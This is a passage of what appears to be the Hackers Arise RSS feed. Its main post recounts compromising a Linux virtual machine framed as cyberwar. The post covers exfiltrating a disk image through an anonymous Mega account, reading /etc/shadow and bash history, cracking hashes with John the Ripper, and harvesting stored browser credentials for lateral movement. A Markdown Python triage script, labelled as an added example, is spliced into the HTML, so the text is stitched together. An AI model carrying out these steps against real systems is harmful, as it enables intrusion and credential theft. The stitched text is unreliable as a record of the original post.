  1240. <figure class="wp-block-image aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="481" src="https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_browse_data-1024x481.webp" alt="" class="wp-image-18452" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_browse_data-1024x481.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_browse_data-300x141.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_browse_data-768x361.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_browse_data.webp 1172w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  1241.  
  1242.  
  1243.  
  1244. <p>One of Spiderfoot’s standout features is its ability to visualize data graphically.</p>
  1245.  
  1246.  
  1247.  
  1248. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="654" src="https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_graph-1024x654.webp" alt="" class="wp-image-18453" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_graph-1024x654.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_graph-300x192.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_graph-768x491.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_graph.webp 1202w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  1249.  
  1250.  
  1251.  
  1252. <p>In the graph, each node represents a distinct piece of information about the target.</p>
  1253.  
  1254.  
  1255.  
  1256. <figure class="wp-block-image aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="407" src="https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_graph_nodes-1024x407.webp" alt="" class="wp-image-18454" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_graph_nodes-1024x407.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_graph_nodes-300x119.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_graph_nodes-768x305.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_graph_nodes.webp 1268w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  1257.  
  1258.  
  1259.  
  1260. <h2 class="wp-block-heading">Summary</h2>
  1261.  
  1262.  
  1263.  
  1264. <p>In this simple approach, you can use a Raspberry Pi to conduct OSINT investigations without installing anything on your primary system. Moreover, you can access the Pi&#8217;s IP address from your phone and review the results during a coffee break—or whenever you have a spare moment.</p>
  1265.  
  1266.  
  1267.  
  1268. <p>As mentioned in the introduction, the Raspberry Pi is a powerful platform for learning cybersecurity.</p>
  1269.  
  1270.  
  1271.  
  1272. <p>If you&#8217;d like to advance in this field, consider checking out our OSINT training class.</p><p>The post <a href="https://hackers-arise.com/getting-started-with-the-raspberry-pi-for-hacking-using-spiderfoot-for-osint-data-gathering/">Getting Started with the Raspberry Pi for Hacking: Using Spiderfoot for OSINT Data Gathering</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></content:encoded>
  1273. </item>
  1274. <item>
  1275. <title>Using Digital Forensic Techniques to Compromise Russian Linux Systems</title>
  1276. <link>https://hackers-arise.com/using-digital-forensic-techniques-to-compromise-russian-linux-systems/</link>
  1277. <comments>https://hackers-arise.com/using-digital-forensic-techniques-to-compromise-russian-linux-systems/#respond</comments>
  1278. <dc:creator><![CDATA[Co11ateral]]></dc:creator>
  1279. <pubDate>Mon, 06 Oct 2025 17:54:47 +0000</pubDate>
  1280. <category><![CDATA[Cyberwar]]></category>
  1281. <category><![CDATA[Cyberwarrior]]></category>
  1282. <category><![CDATA[Digital Forensics]]></category>
  1283. <category><![CDATA[Linux]]></category>
  1284. <category><![CDATA[Offensive Security]]></category>
  1285. <category><![CDATA[Password Cracking]]></category>
  1286. <guid isPermaLink="false">https://hackers-arise.com/?p=17056</guid>
  1287.  
  1288. <description><![CDATA[<p>Welcome back, cyberwarriors. In today’s article, we will walk through a real-world compromise that was made possible through digital forensics. During one of our recent engagements, we landed on a machine located outside the primary domain. Unfortunately, this system held no immediately useful credentials or access paths for lateral movement. Our team attempted a variety [&#8230;]</p>
  1289. <p>The post <a href="https://hackers-arise.com/using-digital-forensic-techniques-to-compromise-russian-linux-systems/">Using Digital Forensic Techniques to Compromise Russian Linux Systems</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></description>
  1290. <content:encoded><![CDATA[<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="683" src="https://hackers-arise.com/wp-content/uploads/2025/08/banner-1024x683.webp" alt="" class="wp-image-17057" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/banner-1024x683.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/08/banner-300x200.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/banner-768x512.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/08/banner.webp 1536w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  1291.  
  1292.  
  1293.  
  1294. <p>Welcome back, cyberwarriors. In today’s article, we will walk through a real-world compromise that was made possible through digital forensics. During one of our recent engagements, we landed on a machine located outside the primary domain. Unfortunately, this system held no immediately useful credentials or access paths for lateral movement. Our team attempted a variety of techniques to extract credentials, ranging from standard SAM parsing to log file analysis and general file inspection. Eventually, we uncovered a valuable asset buried within one of the attached drives, which was a virtual disk.</p>
  1295.  
  1296.  
  1297.  
  1298. <p>For those who read our earlier write-up on compromising a domain through forensic analysis of an old Windows image, you’ll recall how helpful such approaches can be. The same logic applies to Linux systems. Even if the machine in question is inactive, cracking old credentials can still enable lateral movement if password reuse is in play.</p>
  1299.  
  1300.  
  1301.  
  1302. <p>Let’s examine how we extracted, analyzed, and ultimately compromised this Linux virtual machine.</p>
  1303.  
  1304.  
  1305.  
  1306. <h2 class="wp-block-heading"><a></a><strong>Virtual Disk Discovery and Exfiltration</strong></h2>
  1307.  
  1308.  
  1309.  
  1310. <p>The virtual disk was located on a secondary drive of a Windows host. Due to limited space on the drive and to avoid disrupting the system, we chose to exfiltrate the disk to our lab for analysis.</p>
  1311.  
  1312.  
  1313.  
  1314. <p></p>
  1315.  
  1316.  
  1317.  
  1318. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="793" height="317" src="https://hackers-arise.com/wp-content/uploads/2025/08/1-vm-snapshot-found.webp" alt="" class="wp-image-17058" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/1-vm-snapshot-found.webp 793w, https://hackers-arise.com/wp-content/uploads/2025/08/1-vm-snapshot-found-300x120.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/1-vm-snapshot-found-768x307.webp 768w" sizes="(max-width: 793px) 100vw, 793px" /></figure>
  1319.  
  1320.  
  1321.  
  1322. <p></p>
  1323.  
  1324.  
  1325.  
  1326. <p>One reliable method of transferring files from an RDP session is via the Mega cloud service. Using a temporary email address, you can create a Mega account anonymously.</p>
  1327.  
  1328.  
  1329.  
  1330. <p></p>
  1331.  
  1332.  
  1333.  
  1334. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="504" src="https://hackers-arise.com/wp-content/uploads/2025/08/2-snapshot-exfiltration-to-mega-1024x504.webp" alt="" class="wp-image-17059" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/2-snapshot-exfiltration-to-mega-1024x504.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/08/2-snapshot-exfiltration-to-mega-300x148.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/2-snapshot-exfiltration-to-mega-768x378.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/08/2-snapshot-exfiltration-to-mega.webp 1125w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  1335.  
  1336.  
  1337.  
  1338. <p></p>
  1339.  
  1340.  
  1341.  
  1342. <p>Mega provides 20 GB of free storage per account, which is sufficient. If you need more, additional accounts or a paid plan will do the job.</p>
  1343.  
  1344.  
  1345.  
  1346. <h2 class="wp-block-heading"><a></a><strong>Loading the Virtual Machine in VMware</strong></h2>
  1347.  
  1348.  
  1349.  
  1350. <p>Once the file was safely downloaded, we opened VMware and imported it. In this case, it was a <strong>.vmdk</strong> file, which is natively supported by VMware.</p>
  1351.  
  1352.  
  1353.  
  1354. <p></p>
  1355.  
  1356.  
  1357.  
  1358. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="812" height="188" src="https://hackers-arise.com/wp-content/uploads/2025/08/3-downloading-the-snapshot.webp" alt="" class="wp-image-17060" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/3-downloading-the-snapshot.webp 812w, https://hackers-arise.com/wp-content/uploads/2025/08/3-downloading-the-snapshot-300x69.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/3-downloading-the-snapshot-768x178.webp 768w" sizes="(max-width: 812px) 100vw, 812px" /></figure>
  1359.  
  1360.  
  1361.  
  1362. <p></p>
  1363.  
  1364.  
  1365.  
  1366. <p>During the import process, VMware will prompt for a name for the virtual machine and automatically generate a folder in your local environment. Errors can occasionally occur during import. If so, clicking “Retry” generally resolves the issue.</p>
  1367.  
  1368.  
  1369.  
  1370. <p></p>
  1371.  
  1372.  
  1373.  
  1374. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="730" height="384" src="https://hackers-arise.com/wp-content/uploads/2025/08/4-importing-the-snapshot-to-vmware.webp" alt="" class="wp-image-17061" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/4-importing-the-snapshot-to-vmware.webp 730w, https://hackers-arise.com/wp-content/uploads/2025/08/4-importing-the-snapshot-to-vmware-300x158.webp 300w" sizes="(max-width: 730px) 100vw, 730px" /></figure>
  1375.  
  1376.  
  1377.  
  1378. <p></p>
  1379.  
  1380.  
  1381.  
  1382. <p>Once the VM was successfully imported, we attempted to boot it. The machine started as expected, but we were greeted with a login screen requiring credentials.</p>
  1383.  
  1384.  
  1385.  
  1386. <p></p>
  1387.  
  1388.  
  1389.  
  1390. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="795" height="645" src="https://hackers-arise.com/wp-content/uploads/2025/08/5-booting-the-virtual-machine.webp" alt="" class="wp-image-17062" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/5-booting-the-virtual-machine.webp 795w, https://hackers-arise.com/wp-content/uploads/2025/08/5-booting-the-virtual-machine-300x243.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/5-booting-the-virtual-machine-768x623.webp 768w" sizes="(max-width: 795px) 100vw, 795px" /></figure>
  1391.  
  1392.  
  1393.  
  1394. <p></p>
  1395.  
  1396.  
  1397.  
  1398. <p>At this point, you might be tempted to guess weak passwords manually, but a more systematic approach involves unpacking the virtual disk to inspect the filesystem directly.</p>
  1399.  
  1400.  
  1401.  
  1402. <h2 class="wp-block-heading"><a></a><strong>Unpacking the Virtual Disk</strong></h2>
  1403.  
  1404.  
  1405.  
  1406. <p>The <strong>.vmdk</strong> file can be unpacked using <strong>7-Zip</strong>. The following command does the job in PowerShell:</p>
  1407.  
  1408.  
  1409.  
  1410. <p><strong>PS &gt; &amp; "C:\Program Files\7-Zip\7z.exe" x .\vmc-disk1.vmdk -oC:\VM-Extract -y</strong></p>
  1411.  
  1412.  
  1413.  
  1414. <p></p>
  1415.  
  1416.  
  1417.  
  1418. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="422" src="https://hackers-arise.com/wp-content/uploads/2025/08/6-extracting-files-from-the-snapshot-for-digital-forensics-1024x422.webp" alt="" class="wp-image-17063" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/6-extracting-files-from-the-snapshot-for-digital-forensics-1024x422.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/08/6-extracting-files-from-the-snapshot-for-digital-forensics-300x124.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/6-extracting-files-from-the-snapshot-for-digital-forensics-768x316.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/08/6-extracting-files-from-the-snapshot-for-digital-forensics.webp 1083w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  1419.  
  1420.  
  1421.  
  1422. <p></p>
  1423.  
  1424.  
  1425.  
  1426. <p>This extracts the contents of the virtual disk into a new folder called VM-Extract on the C drive. In this case, we obtained three disk image files. The next step was to mount these images to access their contents.</p>
  1427.  
  1428.  
  1429.  
  1430. <p></p>
  1431.  
  1432.  
  1433.  
  1434. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="715" height="127" src="https://hackers-arise.com/wp-content/uploads/2025/08/7-files-extracted-from-the-snapshot.webp" alt="" class="wp-image-17064" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/7-files-extracted-from-the-snapshot.webp 715w, https://hackers-arise.com/wp-content/uploads/2025/08/7-files-extracted-from-the-snapshot-300x53.webp 300w" sizes="(max-width: 715px) 100vw, 715px" /></figure>
  1435.  
  1436.  
  1437.  
  1438. <p></p>
  1439.  
  1440.  
  1441.  
  1442. <h2 class="wp-block-heading"><strong>Mounting Linux Filesystems on Windows</strong></h2>
  1443.  
  1444.  
  1445.  
  1446. <p>Since Windows cannot interpret Linux filesystems by default, attempting to mount them natively results in an error or a prompt to format the disk. To avoid this, we used <strong>DiskInternals Linux Reader</strong>, a free tool that can interpret and mount EXT-based filesystems.</p>
  1447.  
  1448.  
  1449.  
  1450. <p></p>
  1451.  
  1452.  
  1453.  
  1454. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="626" height="284" src="https://hackers-arise.com/wp-content/uploads/2025/08/8-showcasing-DiskInternals-Linux-Reader.webp" alt="" class="wp-image-17065" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/8-showcasing-DiskInternals-Linux-Reader.webp 626w, https://hackers-arise.com/wp-content/uploads/2025/08/8-showcasing-DiskInternals-Linux-Reader-300x136.webp 300w" sizes="(max-width: 626px) 100vw, 626px" /></figure>
  1455.  
  1456.  
  1457.  
  1458. <p></p>
  1459.  
  1460.  
  1461.  
  1462. <p>Upon launching the tool, go to <strong>Drives > Mount Image</strong>, select the <strong>Raw Disk Images</strong> option, and then choose all the extracted image files.</p>
  1463.  
  1464.  
  1465.  
  1466. <p></p>
  1467.  
  1468.  
  1469.  
  1470. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="618" height="382" src="https://hackers-arise.com/wp-content/uploads/2025/08/9-setting-up-DiskInternals-Linux-Reader.webp" alt="" class="wp-image-17066" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/9-setting-up-DiskInternals-Linux-Reader.webp 618w, https://hackers-arise.com/wp-content/uploads/2025/08/9-setting-up-DiskInternals-Linux-Reader-300x185.webp 300w" sizes="(max-width: 618px) 100vw, 618px" /></figure>
  1471.  
  1472.  
  1473.  
  1474. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="938" height="525" src="https://hackers-arise.com/wp-content/uploads/2025/08/10-selecting-extracted-inmages-for-mounting.webp" alt="" class="wp-image-17067" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/10-selecting-extracted-inmages-for-mounting.webp 938w, https://hackers-arise.com/wp-content/uploads/2025/08/10-selecting-extracted-inmages-for-mounting-300x168.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/10-selecting-extracted-inmages-for-mounting-768x430.webp 768w" sizes="(max-width: 938px) 100vw, 938px" /></figure>
  1475.  
  1476.  
  1477.  
  1478. <p></p>
  1479.  
  1480.  
  1481.  
  1482. <p>Once completed, you should see the Linux filesystem appear in the Linux Reader interface, allowing you to navigate through its structure.</p>
  1483.  
  1484.  
  1485.  
  1486. <p></p>
  1487.  
  1488.  
  1489.  
  1490. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="737" height="121" src="https://hackers-arise.com/wp-content/uploads/2025/08/11-the-linux-drive-has-been-mounted.webp" alt="" class="wp-image-17068" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/11-the-linux-drive-has-been-mounted.webp 737w, https://hackers-arise.com/wp-content/uploads/2025/08/11-the-linux-drive-has-been-mounted-300x49.webp 300w" sizes="(max-width: 737px) 100vw, 737px" /></figure>
  1491.  
  1492.  
  1493.  
  1494. <p></p>
  1495.  
  1496.  
  1497.  
  1498. <h2 class="wp-block-heading"><strong>Initial Analysis</strong></h2>
  1499.  
  1500.  
  1501.  
  1502. <p>With access to the mounted filesystem, our first goal was to recover the stored credentials. System administrators frequently reuse passwords, so even stale credentials can provide lateral movement opportunities. Additionally, Linux systems often lack comprehensive security tooling, making them ideal for establishing long-term persistence.</p>
  1503.  
  1504.  
  1505.  
  1506. <p></p>
  1507.  
  1508.  
  1509.  
  1510. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://hackers-arise.com/wp-content/uploads/2025/08/12-analyzing-shadow-file-1024x639.webp" alt="" class="wp-image-17069" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/12-analyzing-shadow-file-1024x639.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/08/12-analyzing-shadow-file-300x187.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/12-analyzing-shadow-file-768x479.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/08/12-analyzing-shadow-file.webp 1239w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  1511.  
  1512.  
  1513.  
  1514. <p></p>
  1515.  
  1516.  
  1517.  
  1518. <p>We began by locating the <strong>/etc/shadow</strong> file, which stores password hashes. On this system, the hashing algorithm used was yescrypt, a modern and secure scheme not currently supported by Hashcat. That said, John the Ripper does support it, and we’ll return to this shortly.</p>
  1519.  
  1520.  
  1521.  
  1522. <p>Next, we exported <strong>.bash_history</strong> from <strong>/home/user/</strong> and <strong>/root/</strong>. This file logs command history for the user and often includes IP addresses, script execution details, and occasionally even plaintext passwords. If Linux Reader fails to display the file due to size limitations, right-click and export it to your Windows host for proper inspection.</p>
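<p>The following Python triage script is an added example, not code from the engagement or from the authors: it runs over exported copies of /etc/shadow and .bash_history (the file contents below are constructed, and the user names, hosts and hash strings are placeholders), reports the hash scheme of each account, flags empty or locked password fields, and lists history lines that carry a plaintext secret so the defender knows which credentials to rotate.</p>

```python
"""Triage of files recovered from a mounted Linux image.

Added example for the Initial Analysis step; it is not the authors' code.
It reads exported copies of /etc/shadow and .bash_history and reports the
password-hash scheme per account plus shell-history lines that embed a
plaintext secret, so those credentials can be rotated."""
import re
from typing import Dict, List, Tuple

# crypt(3) prefix -> scheme. Per the article, yescrypt is not handled by
# Hashcat but is by John the Ripper's crypt format.
SCHEMES = {
    "$y$": "yescrypt",
    "$7$": "scrypt",
    "$6$": "sha512crypt",
    "$5$": "sha256crypt",
    "$2b$": "bcrypt",
    "$2y$": "bcrypt",
    "$1$": "md5crypt",
}

# Command shapes that commonly carry a secret on the command line.
SECRET_PATTERNS = [
    re.compile(r"\b(?:mysql|mysqldump|mariadb)\b.*\s-p\S+"),  # -pPASSWORD
    re.compile(r"\bsshpass\s+-p\s*\S+"),
    re.compile(r"--password[= ]\S+"),
    re.compile(r"\bcurl\b.*\s-u\s*\S+:\S+"),
    re.compile(r"://[^/\s:]+:[^@\s]+@"),                     # user:pass@host
]


def classify_shadow_entry(line: str) -> Tuple[str, str]:
    """Return (account, verdict) for one /etc/shadow line."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2:
        return ("?", "malformed")
    user, field = fields[0], fields[1]
    if field == "":
        return (user, "EMPTY password field (login without password)")
    if field.startswith(("!", "*")):
        return (user, "locked / no password login")
    for prefix, name in SCHEMES.items():
        if field.startswith(prefix):
            return (user, name)
    return (user, "unknown scheme (possibly legacy DES)")


def audit_shadow(text: str) -> Dict[str, str]:
    """Map every account in a shadow file to its hash scheme or state."""
    return dict(classify_shadow_entry(l) for l in text.splitlines() if l.strip())


def find_history_secrets(text: str) -> List[Tuple[int, str]]:
    """Return (line_no, command) for history lines that look like they contain a secret."""
    hits = []
    for no, cmd in enumerate(text.splitlines(), start=1):
        if any(p.search(cmd) for p in SECRET_PATTERNS):
            hits.append((no, cmd))
    return hits


# Constructed sample input; hashes are placeholder strings, not real digests.
SAMPLE_SHADOW = """root:$y$j9T$SALTSALTSALT$HASHHASHHASHHASHHASHHASHHASHHASHHASHHASH:19900:0:99999:7:::
daemon:*:19000:0:99999:7:::
svc_backup:$6$rounds=5000$SALTSALT$HASHHASHHASHHASHHASHHASHHASHHASHHASHHASHHASHHASHHASHHASHHASHH:19500:0:99999:7:::
legacy:$1$SALT$HASHHASHHASHHASHHASHHA:18000:0:99999:7:::
guest::19900:0:99999:7:::
"""

SAMPLE_HISTORY = """ls -la /opt
mysql -u app -pS3cretPass app_db
sshpass -p 'Winter2024!' ssh admin@10.0.0.5
curl -u deploy:hunter2 https://ci.example.internal/api/build
git clone https://svc:T0ken@repo.example.internal/infra.git
cat /var/log/auth.log | tail
"""

if __name__ == "__main__":
    for user, verdict in audit_shadow(SAMPLE_SHADOW).items():
        print(f"{user:12s} {verdict}")
    for no, cmd in find_history_secrets(SAMPLE_HISTORY):
        print(f"history line {no}: {cmd}")
```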
  1523.  
  1524.  
  1525.  
  1526. <p></p>
  1527.  
  1528.  
  1529.  
  1530. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="901" height="482" src="https://hackers-arise.com/wp-content/uploads/2025/08/13-analyzing-the-history-file.webp" alt="" class="wp-image-17070" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/13-analyzing-the-history-file.webp 901w, https://hackers-arise.com/wp-content/uploads/2025/08/13-analyzing-the-history-file-300x160.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/13-analyzing-the-history-file-768x411.webp 768w" sizes="(max-width: 901px) 100vw, 901px" /></figure>
  1531.  
  1532.  
  1533.  
  1534. <p></p>
  1535.  
  1536.  
  1537.  
  1538. <p>Beyond bash history, another good target is the crontab directory. Some cron jobs use embedded credentials in scripts for automated tasks, which can also be repurposed for access.</p>
  1539.  
  1540.  
  1541.  
  1542. <h2 class="wp-block-heading"><a></a><strong>Password Recovery Using John the Ripper</strong></h2>
  1543.  
  1544.  
  1545.  
  1546. <p>As Hashcat cannot currently handle yescrypt, we opted to use John the Ripper. The syntax is straightforward:</p>
  1547.  
  1548.  
  1549.  
  1550. <p><strong>kali &gt; sudo john --format=crypt --wordlist=rockyou.txt hashes.txt</strong></p>
  1551.  
  1552.  
  1553.  
  1554. <p></p>
  1555.  
  1556.  
  1557.  
  1558. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="182" src="https://hackers-arise.com/wp-content/uploads/2025/08/14-cracking-hash-with-john-the-ripper-1024x182.webp" alt="" class="wp-image-17071" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/14-cracking-hash-with-john-the-ripper-1024x182.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/08/14-cracking-hash-with-john-the-ripper-300x53.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/14-cracking-hash-with-john-the-ripper-768x136.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/08/14-cracking-hash-with-john-the-ripper.webp 1053w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  1559.  
  1560.  
  1561.  
  1562. <p></p>
  1563.  
  1564.  
  1565.  
  1566. <p>The output might look like an error, especially if the cracked password is something as simple as “1”, but that was indeed the correct password for both user accounts on this machine. We tested it, and it worked. We had successfully logged into the virtual machine.</p>
  1567.  
  1568.  
  1569.  
  1570. <p></p>
  1571.  
  1572.  
  1573.  
  1574. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="544" src="https://hackers-arise.com/wp-content/uploads/2025/08/15-unlocking-the-vm-1024x544.webp" alt="" class="wp-image-17072" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/15-unlocking-the-vm-1024x544.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/08/15-unlocking-the-vm-300x160.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/15-unlocking-the-vm-768x408.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/08/15-unlocking-the-vm-1536x817.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/08/15-unlocking-the-vm.webp 1815w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  1575.  
  1576.  
  1577.  
  1578. <p></p>
  1579.  
  1580.  
  1581.  
  1582. <h2 class="wp-block-heading"><strong>Post-Access Exploration</strong></h2>
  1583.  
  1584.  
  1585.  
  1586. <p>With access to the virtual environment, we began exploring more thoroughly. One of the first things we reviewed was the browser history, followed by saved credentials in applications like Mozilla Firefox. We also checked authentication logs and Remmina session logs, which could provide saved credentials or remote system details.</p>
  1587.  
  1588.  
  1589.  
  1590. <p></p>
  1591.  
  1592.  
  1593.  
  1594. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="343" src="https://hackers-arise.com/wp-content/uploads/2025/08/16-found-credentials-in-the-browser-1024x343.webp" alt="" class="wp-image-17073" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/16-found-credentials-in-the-browser-1024x343.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/08/16-found-credentials-in-the-browser-300x100.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/16-found-credentials-in-the-browser-768x257.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/08/16-found-credentials-in-the-browser.webp 1142w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  1595.  
  1596.  
  1597.  
  1598. <p></p>
  1599.  
  1600.  
  1601.  
  1602. <p>Indeed, we discovered a stored credential for a web service in Firefox. With this information, we scanned the internal network for hosts running the same service. If reachable, such services can often be exploited either by reusing the credentials or through a vulnerability in the service itself. In some cases, this leads to remote code execution and full system compromise.</p><p>The post <a href="https://hackers-arise.com/using-digital-forensic-techniques-to-compromise-russian-linux-systems/">Using Digital Forensic Techniques to Compromise Russian Linux Systems</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></content:encoded>
  1603. <wfw:commentRss>https://hackers-arise.com/using-digital-forensic-techniques-to-compromise-russian-linux-systems/feed/</wfw:commentRss>
  1604. <slash:comments>0</slash:comments>
  1605. </item>
  1606. <item>
  1607. <title>Python Basics for Hackers: Building a Wi-Fi Scanner Capable of Locating the Position of Local AP&#8217;s</title>
  1608. <link>https://hackers-arise.com/python-basics-for-hackers-building-a-wi-fi-scanner-capable-of-locating-the-position-of-local-aps/</link>
  1609. <comments>https://hackers-arise.com/python-basics-for-hackers-building-a-wi-fi-scanner-capable-of-locating-the-position-of-local-aps/#respond</comments>
  1610. <dc:creator><![CDATA[OTW]]></dc:creator>
  1611. <pubDate>Sat, 04 Oct 2025 15:46:24 +0000</pubDate>
  1612. <category><![CDATA[Python]]></category>
  1613. <category><![CDATA[Scripting]]></category>
  1614. <category><![CDATA[Wi-Fi Hacking]]></category>
  1615. <guid isPermaLink="false">https://hackers-arise.com/?p=16533</guid>
  1616.  
  1617. <description><![CDATA[<p>Hackers Arise Wi-Fi Radar Welcome back, aspiring cyberwarriors! One of our advanced students, who goes by the handle Mike211, has developed a Wi-Fi scanning script that we want to share with all of you. What makes this script different and special is its ability to locate the Wi-Fi access points (AP) in your area. I&#8217;ll [&#8230;]</p>
  1618. <p>The post <a href="https://hackers-arise.com/python-basics-for-hackers-building-a-wi-fi-scanner-capable-of-locating-the-position-of-local-aps/">Python Basics for Hackers: Building a Wi-Fi Scanner Capable of Locating the Position of Local AP’s</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></description>
  1619. <content:encoded><![CDATA[<h1 class="wp-block-heading">Hackers Arise Wi-Fi Radar </h1>
  1620.  
  1621.  
  1622.  
  1623. <p></p>
  1624.  
  1625.  
  1626.  
  1627. <h2 class="wp-block-heading">Welcome back, aspiring cyberwarriors!</h2>
  1628.  
  1629.  
  1630.  
  1631. <p></p>
  1632.  
  1633.  
  1634.  
  1635. <p>One of our advanced students, who goes by the handle Mike211, has developed a Wi-Fi scanning script that we want to share with all of you. What makes this script different and special is its ability to locate the Wi-Fi access points (AP) in your area.</p>
  1636.  
  1637.  
  1638.  
  1639. <p></p>
  1640.  
  1641.  
  1642.  
  1643. <p>I&#8217;ll let him introduce his new tool below!</p>
  1644.  
  1645.  
  1646.  
  1647. <p>In the Wi-Fi domain, raw signal strength and MAC identifiers can reveal more than just the presence of networks — they can open a path to estimating physical distance, mapping access points, and even executing wardriving missions or indoor localization without GPS. If you’ve ever wanted to push the boundaries of Wi-Fi auditing beyond mere detection, Hackers Arise Radar is your next-level tool.</p>
  1648.  
  1649.  
  1650.  
  1651. <h2 class="wp-block-heading">Why this Tool is Game&nbsp;Changing</h2>
  1652.  
  1653.  
  1654.  
  1655. <p>Just like Wigle.net collects crowdsourced location data of APs, this project allows you to discover and map Wi-Fi access points in real time using only your Linux laptop or USB Wi-Fi adapter.</p>
  1656.  
  1657.  
  1658.  
  1659. <p>With this tool, you’ll get:</p>
  1660.  
  1661.  
  1662.  
  1663. <p>&#8211; Continuous scans over 2.4 GHz, 5 GHz, 6 GHz, or all bands<br>&#8211; Fully automated interface setup (monitor mode, regulatory domain, TX power)<br>&#8211; Filtered and smoothed RSSI values with Kalman filtering<br>&#8211; On-demand calibration for RSSI-to-distance<br>&#8211; Spring-model map generation to visualize spatial relationships<br>&#8211; Exportable logs, visuals, and calibration profiles for future use</p>
  1664.  
  1665.  
  1666.  
  1667. <p>Whether you&#8217;re driving through a city, walking indoors, or performing a pentest, you can leverage this tool for actionable location data.</p>
  1668.  
  1669.  
  1670.  
  1671. <h2 class="wp-block-heading">How it Works – Step by Step</h2>
  1672.  
  1673.  
  1674.  
